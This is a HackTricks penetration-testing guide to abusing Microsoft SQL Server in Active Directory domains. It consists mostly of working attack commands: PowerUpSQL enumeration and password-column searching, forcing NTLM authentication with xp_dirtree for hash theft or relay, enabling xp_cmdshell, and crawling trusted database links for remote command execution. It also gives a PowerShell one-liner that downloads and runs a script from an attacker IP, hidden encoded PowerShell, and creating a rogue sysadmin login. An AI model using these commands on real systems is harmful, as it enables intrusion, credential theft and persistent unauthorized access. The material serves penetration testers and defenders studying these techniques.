# MSSQL AD Abuse
Support HackTricks and get benefits! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
## **MSSQL Enumeration / Discovery** The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case. ```powershell Import-Module .\PowerupSQL.psd1 ``` ### Enumerating from the network without domain session ```powershell # Get local MSSQL instance (if any) Get-SQLInstanceLocal Get-SQLInstanceLocal | Get-SQLServerInfo #If you don't have a AD account, you can try to find MSSQL scanning via UDP #First, you will need a list of hosts to scan Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10 #If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them #The discovered MSSQL servers must be on the file: C:\temp\instances.txt Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test ``` ### Enumerating from inside the domain ```powershell # Get local MSSQL instance (if any) Get-SQLInstanceLocal Get-SQLInstanceLocal | Get-SQLServerInfo #Get info about valid MSQL instances running in domain #This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance) Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose #Test connections with each one Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose #Try to connect and obtain info from each MSSQL server (also useful to check conectivity) Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose # Get DBs, test connections and get info in oneliner Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo ``` ## MSSQL Basic Abuse ### Access DB ```powershell #Perform a SQL query Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername" #Dump an instance (a lotof CVSs generated in current dir) Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql" # Search keywords in columns trying to access the MSSQL DBs ## This won't use trusted SQL links Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize ``` ### MSSQL xp\_dirtree abuse Executing something such as `EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1` will make the MSSQL server to **login** to the specified **IP address**. ### Steal NetNTLM hash / Relay attack Using **`xp_dirtree`** it's possible to **force** a NTLM **authentication**, therefore it's possible to **steal** the NetNTLM **hash** or even perform a **relay attack**. Using tools such as **responder** or **Inveigh** it's possible to **steal the NetNTLM hash**.\ You can see how to use these tools in: {% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} [spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) {% endcontent-ref %} ### MSSQL RCE It might be also possible to **execute commands** inside the MSSQL host ```powershell Invoke-SQLOSCmd -Instance "srv-1.dev.cyberbotic.io,1433" -Command "whoami" -RawResults # Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary ``` If **manually** you could just use:
#To enumerate the current state of xp_cmdshell
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# A value of 0 shows that xp_cmdshell is disabled. To enable it:
sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# Execute
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'powershell -w hidden -enc <blah>';
### MSSQL Extra {% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md" %} [pentesting-mssql-microsoft-sql-server.md](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server.md) {% endcontent-ref %} ## MSSQL Trusted Links If a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands. **The links between databases work even across forest trusts.** ### Powershell Abuse ```powershell #Look for MSSQL links of an accessible instance Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0 #Crawl trusted links, starting form the given one (the user being used by the MSSQL instance is also specified) Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose #If you are sysadmin in some trusted link you can enable xp_cmdshell with: Get-SQLServerLinkCrawl -instance "" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT ""' #Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'" #Obtain a shell Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"' #Check for possible vulnerabilities on an instance where you have access Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local" #Try to escalate privileges on an instance Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1" #Manual trusted link queery Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')" ## Enable xp_cmdshell and check it Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');' Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]' Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]' ## If you see the results of @@selectname, it worked Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');' ``` ### Metasploit You can easily check for trusted links using metasploit. ```bash #Set username, password, windows auth (if using AD), IP... msf> use exploit/windows/mssql/mssql_linkcrawler [msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session ``` Notice that metasploit will try to abuse only the `openquery()` function in MSSQL (so, if you can't execute command with `openquery()` you will need to try the `EXECUTE` method **manually** to execute commands, see more below.) ### Manual - Openquery() From **Linux** you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py.** From **Windows** you could also find the links and execute commands manually using a **MSSQL client like** [**HeidiSQL**](https://www.heidisql.com)**** _Login using Windows authentication:_ ![](<../../.gitbook/assets/image (167) (1).png>) #### Find Trustable Links ```sql select * from master..sysservers ``` ![](<../../.gitbook/assets/image (168).png>) #### Execute queries in trustable link Execute queries through the link (example: find more links in the new accessible instance): ```sql select * from openquery("dcorp-sql1", 'select * from master..sysservers') ``` {% hint style="warning" %} Check where double and single quotes are used, it's important to use them that way. {% endhint %} ![](<../../.gitbook/assets/image (169).png>) You can continue these trusted links chain forever manually. ```sql # First level RCE SELECT * FROM OPENQUERY("", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''') # Second level RCE SELECT * FROM OPENQUERY("", 'select * from openquery("", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')') ``` If you cannot perform actions like `exec xp_cmdshell` from `openquery()` try with the `EXECUTE` method. ### Manual - EXECUTE You can also abuse trusted links using `EXECUTE`: ```bash #Create user and give admin privileges EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" ``` ## Local Privilege Escalation The **MSSQL local user** usually has a special type of privilege called **`SeImpersonatePrivilege`**. This allows the account to "impersonate a client after authentication". A strategy that many authors have come up with is to force a SYSTEM service to authenticate to a rogue or man-in-the-middle service that the attacker creates. This rogue service is then able to impersonate the SYSTEM service whilst it's trying to authenticate. [SweetPotato](https://github.com/CCob/SweetPotato) has a collection of these various techniques which can be executed via Beacon's `execute-assembly` command.
Support HackTricks and get benefits! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**